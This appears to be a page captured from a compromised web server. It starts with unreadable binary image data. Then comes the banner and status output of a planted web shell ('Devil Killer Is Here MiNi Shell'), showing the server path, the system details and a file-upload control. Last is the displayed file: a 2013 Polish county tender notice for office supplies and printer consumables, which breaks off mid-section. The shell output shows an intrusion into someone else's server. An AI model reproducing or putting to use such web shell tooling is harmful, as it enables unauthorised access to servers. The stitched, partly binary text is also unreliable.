JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130103/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130103/3436-N-2013.html

<p class="kh_header"><b>Nowa Sól: Zakup i dostawa materiałów biurowych oraz materiałów eksploatacyjnych dla Starostwa
Powiatowego w Nowej Soli</b><br>
<b>Numer ogłoszenia: 3436 - 2013; data zamieszczenia: 03.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosolski , ul. Moniuszki 3B, 67-100 Nowa Sól, woj. lubuskie, tel. 68 4586800, faks 68 4586831.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nowosolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów biurowych oraz materiałów eksploatacyjnych dla Starostwa
Powiatowego w Nowej Soli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie prowadzone dla zamówienia publicznego o wartości szacunkowej poniżej 200.000,00
euro.
Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych oraz materiałów eksploatacyjnych
na potrzeby Starostwa Powiatowego w Nowej Soli.
1.Przedmiot zamówienia obejmuje sukcesywną (partiami, w zależności od potrzeb) dostawę do
wskazanego miejsca w siedzibie Zamawiającego:
- część 1: materiałów biurowych;
- część 2: materiałów eksploatacyjnych do drukarek komputerowych, faksów i kserokopiarek.
2.Przewidywany asortyment i ilości określone zostały w:
- CZĘŚĆ 1 - materiały biurowe - w Formularzu cenowym stanowiącym załącznik nr 1.1. i opisie
przedmiotu zamówienia stanowiącym załącznik nr 2.1. do SIWZ.
-CZĘŚĆ II - materiały eksploatacyjne do drukarek komputerowych, faksów i kserokopiarek - w
formularzu cenowym załącznik nr 1.2. i opisie przedmiotu zamówienia stanowiącym załącznik nr
2.2. do SIWZ,
Uzupelnienie opisu przedmiotu zamówienia stanowią :
-załącznik nr 1.1.i/lub zał. nr 1.2. - Formularz cenowy;
-zał. nr 2.1. i/lub zał. nr 2.2. - Opis przedmiotu zamówienia;
-zał. nr 4 - Formularz istotnych postanowień umowy.
3.CZĘŚĆ I zamówienia: dostawa materiałów biurowych
3.1.Zamawiający wymaga artykułów biurowych o takich samych parametrach technicznych i
jakościowych jakie opisane są w załącznikach nr 1.1. , nr 1.2.

3.2. W odniesieniu do wszystkich pozycji ujętych w Formularzu cenowym - załącznik nr 1.1. do SIWZ
Zamawiający dopuszcza dostawę materiałów biurowych równoważnych. Przez produkt równoważny
Zamawiający rozumie produkt fabrycznie nowy o jakości wykonania i funkcjonalności nie gorszej niż
oferowane przez producentów znanych marek wykazanych w tabeli.
3.3.Jeżeli w trakcie umowy Zamawiający stwierdzi, że wydajność, jakość lub niezawodność
dostarczonych materiałów nie spełnia ogólnie wymaganych norm funkcjonalnych lub jakościowych -
Wykonawca zobowiązany będzie materiał wymienić na nowy, wolny od stwierdzonych wad.
3.4.Zamawiający wymaga aby wszystkie dostarczane materiały opatrzone były znakiem firmowym
producenta oraz etykietą pozwalającą na jednoznaczną identyfikację oferowanego produktu.
3.5.Zamawiający wymaga, żeby wykonawca dołączył do swojej oferty specyfikację techniczną na
oferowany papier, który powinien posiadać co najmniej parametry wskazane w załączniku nr 2.1.do
SIWZ. Papier biurowy powinien być przeznaczony do różnych zastosowań tj. być przeznaczony do
wszystkich potrzeb biurowych, do druku kolorowego, czarno - białego i kopiowania.
4.CZEŚĆ II zamówienia: materiały eksploatacyjne do drukarek komputerowych, faksów i
kserokopiarek
4.1.W odniesieniu do wszystkich pozycji ujętych w Formularzu cenowym - załącznik nr 1.2. do SIWZ
Zamawiający dopuszcza dostawę materiałów eksploatacyjnych równoważnych.
4.1.1. Przez produkt równoważny Zamawiający rozumie produkt:
- fabrycznie nowy, nie regenerowany, pochodzący z bieżącej produkcji,
- nie noszący śladów poprzedniego użytkowania,
- którego wydajność jest co najmniej taka, jak materiału oryginalnego zalecanego przez
producenta urządzeń,
- który zapewnia jakość wydruku co najmniej taką, jak materiał oryginalny, zalecany przez
producenta urządzeń (w szczególności dotyczy koloru),
- który nie ogranicza pełnej współpracy z programem drukarki monitorującej stan zasobników
z tuszem lub tonerem,
- który w żadnym stopniu nie narusza praw patentowych ani innej własności intelektualnej,
dotyczy tonerów
- w którym zastosowano toner dopasowany do pracy z danym urządzeniem
- które nie mogą spowodować zerwania umów gwarancyjnych na sprzęt objęty tą gwarancją
z winy użytkowania niewłaściwych materiałów
- który posiada takie same lub lepsze parametry techniczne, jakościowe, funkcjonalne oraz
użytkowe jak produkt oryginalny, nie spowodują zerwania umów gwarancyjnych, muszą być
w pełni kompatybilne z urządzeniami, w których mają być użytkowane jako materiały
eksploatacyjne.
4.1.2. Ponadto pod pojęciem fabrycznie nowych - Zamawiający rozumie wyroby wyprodukowane w
przedsiębiorstwie działającym zgodnie z obowiązującymi przepisami prawa. Wszystkie
oferowane materiały winny być opatrzone znakiem firmowym producenta oraz etykietą
zawierającą numer katalogowy i termin ważności. Zamawiający wymaga, aby dostarczone
materiały wyprodukowane były nie wcześniej niż 6 miesięcy przed terminem ich dostawy do
Zamawiającego. Zamawiający nie dopuszcza możliwości zaoferowania materiałów
eksploatacyjnych napełnianych powtórnie lub skopiowanych w sposób naruszający prawo
polskie lub UE.
4.1.3. W przypadku uszkodzenia urządzenia, którego przyczyną - na podstawie opinii autoryzowanego
serwisu producenta - będzie użycie dostarczanych materiałów eksploatacyjnych innych niż
zalecane przez producenta urządzenia, Wykonawca zobowiązany jest do naprawy urządzenia w
autoryzowanym serwisie, na własny koszt, w terminie nie dłuższym niż 14 dni od daty zgłoszenia
uszkodzenia. Jeżeli Wykonawca nie wywiąże się z obowiązku określonego powyżej lub wywiąże
się w sposób nienależyty, Zamawiającemu służyć będzie prawo zastępczego dokonania
naprawy na koszt i ryzyko Wykonawcy. Koszt wydania opinii stwierdzającej uszkodzenie
urządzenia z winy dostarczonych materiałów eksploatacyjnych ponosi Wykonawca.
Ponadto:
4.1.3.1. dostarczone materiały eksploatacyjne do urządzeń biurowych muszą być w 100 procentach oryginalnie
nowe zalecane przez producenta, nie regenerowane oraz objęte gwarancją, o standardowej
pojemności. Oferty, które będą złożone na materiały eksploatacyjne regenerowane zostaną
odrzucone.
4.1.3.2. oryginalnie, fabrycznie nowe, wcześniej nie eksploatowane (dotyczy to wszystkich elementów
składowych kardridżów), niedopuszczalne jest zaoferowanie materiałów regenerowanych tzn.wykorzystujących oryginalne materiały używane jak np. dysze, obudowy; czyszczone oraz
ponownie napełniane tuszem lub innymi materiałami eksploatacyjnymi.
4.1.3.3. elementy składowe nie mogą pochodzić z rynku wtórnego (ze skupu pustych, używanych
wcześniej kardridży).
4.1.3.4. opakowanie materiału eksploatacyjnego wewnątrz jak i na zewnątrz powinno zawierać pełną
nazwę producenta z opisem zawartości, numerem katalogowym (symbolem) produktu, termin
ważności oraz muszą posiadać minimum 12 miesięczną gwarancję , licząc od daty dostawy
materiału lub każdej partii materiału.
4.1.3.5. indywidualne opakowania wewnętrzne muszą być hermetycznie zapakowane w mocnej folii
uniemożliwiającej kontakt kardridża z atmosferą (promieniami słonecznymi, wilgocią itp.)
podczas transportu i późniejszego przechowywania.
4.1.3.6. materiały muszą posiadać jednorazową czytelnie umieszczoną plombę na zewnątrz
opakowania, której obecność gwarantuje, że kardridż nie był wcześniej eksploatowany.
4.1.3.7. Wykonawca jest zobowiązany do odbioru zużytych (pustych) opakowań po tuszach i tonerach i
poddania ich recyklingowi lub utylizacji na własny koszt. Odbiór przez Wykonawcę pustych
opakowań następować będzie w siedzibie Zamawiającego sukcesywnie po telefonicznym
uzgodnieniu terminu. Wykonawca potwierdzi Zamawiającemu odbiór - kartą odbioru odpadu -
zgodnie z obowiązującymi przepisami prawa w tym zakresie.
UWAGA: w przypadku zaoferowania materiałów oryginalnych, zalecanych przez producenta
urządzenia - określonych przez Zamawiającego w FORMULARZU CENOWYM - Wykonawca w
kolumnie 3 - załącznik nr 1.2. do SIWZ winien wpisać: oryginalny. W przypadku zaoferowania
materiałów równoważnych - w kolumnie 3- załącznik nr 1.2. do SIWZ należy określić
producenta, nadane przez niego oznaczenie oraz określić pojemność, wydajność, Wykonawca
składając ofertę na produkty równoważne musi dołączyć stosowne dokumenty potwierdzające
równoważność oferowanych materiałów eksploatacyjnych, potwierdzenie zgodności parametrów.
5.Uwagi końcowe:
5.1. Podane w formularzach cenowych ilości stanowią jedynie wielkości szacunkowe. Zostaną one ściśle
określone w kolejnych jednostkowych zamówieniach w zależności od bieżących potrzeb Zamawiającego,
przy zachowaniu cen jednostkowych określonych w ofercie Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2, 30.12.51.00-2, 30.12.51.10-5, 30.12.51.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie uznany za spełniony, jeżeli wykonawca złoży wraz z ofertą oświadczenie o
spełnieniu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie uznany za spełniony, jeżeli wykonawca złoży wraz z ofertą oświadczenie o
spełnieniu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie uznany za spełniony, jeżeli wykonawca złoży wraz z ofertą oświadczenie o
spełnieniu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie uznany za spełniony, jeżeli wykonawca złoży wraz z ofertą oświadczenie o
spełnieniu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie uznany za spełniony, jeżeli wykonawca złoży wraz z ofertą oświadczenie o
spełnieniu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Dokumenty wymagane w ofercie:
1.1. formularz ofertowy - sporządzony wg wzoru stanowiącego załącznik nr 1 SIWZ;
1.2.formularz cenowy - sporządzony wg wzoru załącznika nr 1.1. i/lub 1.2. ( w zależności od części)
1.3. formularz istotnych postanowień umowy - załącznik nr 4 SIWZ;
1.4.wykaz podwykonawców- załącznik nr 5 SIWZ;
1.5.specyfikacja na oferowany papier (składając ofertę na CZĘŚĆ I) ;
1.6. Wykonawca składając ofertę na produkty równoważne musi dołączyć stosowne dokumenty
potwierdzające równoważność oferowanych materiałów eksploatacyjnych, potwierdzenie
zgodności parametrów ;
1.7.pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy
oferta została złożona przez Wykonawców wspólnie ubiegający się o udzielenie - określające zakres
umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu - stosownie do
art. 23 ustawy;
1.8.dokument potwierdzający umocowanie osoby podpisującej ofertę do składania oświadczeń
woli w imieniu Wykonawcy (jeżeli umocowanie nie wynika wprost z dokumentów, o których mowa w
pkt 3 ppkt. 3.2.);
1.9. pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych
zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli Wykonawca, wskazując
spełnienie warunków, polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych
do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, (niezależnie od
charakteru prawnego łączących go z nimi stosunków)
1.10.pozostałe oświadczenia i dokumenty, o których mowa w Rozdz. XIV SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień umowy zawiera zał. nr 4 Formularz istotnych postanowień umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-nowosolski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, 67-100 Nowa Sól, ul. Moniuszki 3b, pok.201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2013 godzina 09:00, miejsce: Powiat Nowosolski z siedzibą Starostwa Powiatowego,
Ul. Moniuszki 3b, 67-100 Nowa Sól,
Sekretariat - I piętro - pok.109,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> materiały biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje sukcesywną (partiami, w zależności od potrzeb) dostawę do
wskazanego miejsca w siedzibie Zamawiającego:
- część 1: materiałów biurowych;
2.Przewidywany asortyment i ilości określone zostały w:
-CZĘŚĆ 1 - materiały biurowe - w Formularzu cenowym stanowiącym załącznik nr 1.1. i opisie
przedmiotu zamówienia stanowiącym załącznik nr 2.1. do SIWZ.
Uzupelnienie opisu przedmiotu zamówienia stanowią :
-załącznik nr 1.1. - Formularz cenowy;
-zał. nr 2.1.  - Opis przedmiotu zamówienia;
-zał. nr 4 - Formularz istotnych postanowień umowy.3.CZĘŚĆ I zamówienia: dostawa materiałów biurowych
3.1.Zamawiający wymaga artykułów biurowych o takich samych parametrach technicznych i
jakościowych jakie opisane są w załącznikach nr 1.1. , 2.1.

3.2. W odniesieniu do wszystkich pozycji ujętych w Formularzu cenowym - załącznik nr 1.1. do SIWZ
Zamawiający dopuszcza dostawę materiałów biurowych równoważnych. Przez produkt równoważny
Zamawiający rozumie produkt fabrycznie nowy o jakości wykonania i funkcjonalności nie gorszej niż
oferowane przez producentów znanych marek wykazanych w tabeli.
3.3.Jeżeli w trakcie umowy Zamawiający stwierdzi, że wydajność, jakość lub niezawodność
dostarczonych materiałów nie spełnia ogólnie wymaganych norm funkcjonalnych lub jakościowych -
Wykonawca zobowiązany będzie materiał wymienić na nowy, wolny od stwierdzonych wad.
3.4.Zamawiający wymaga aby wszystkie dostarczane materiały opatrzone były znakiem firmowym
producenta oraz etykietą pozwalającą na jednoznaczną identyfikację oferowanego produktu.
3.5.Zamawiający wymaga, żeby wykonawca dołączył do swojej oferty specyfikację techniczną na
oferowany papier, który powinien posiadać co najmniej parametry wskazane w załączniku nr 2.1.do
SIWZ. Papier biurowy powinien być przeznaczony do różnych zastosowań tj. być przeznaczony do
wszystkich potrzeb biurowych, do druku kolorowego, czarno - białego i kopiowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Matriały eksploatacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje sukcesywną (partiami, w zależności od potrzeb) dostawę do
wskazanego miejsca w siedzibie Zamawiającego:

- część 2: materiałów eksploatacyjnych do drukarek komputerowych, faksów i kserokopiarek.

Przewidywany asortyment i ilości określone zostały w:
-CZĘŚĆ II - materiały eksploatacyjne do drukarek komputerowych, faksów i kserokopiarek - w
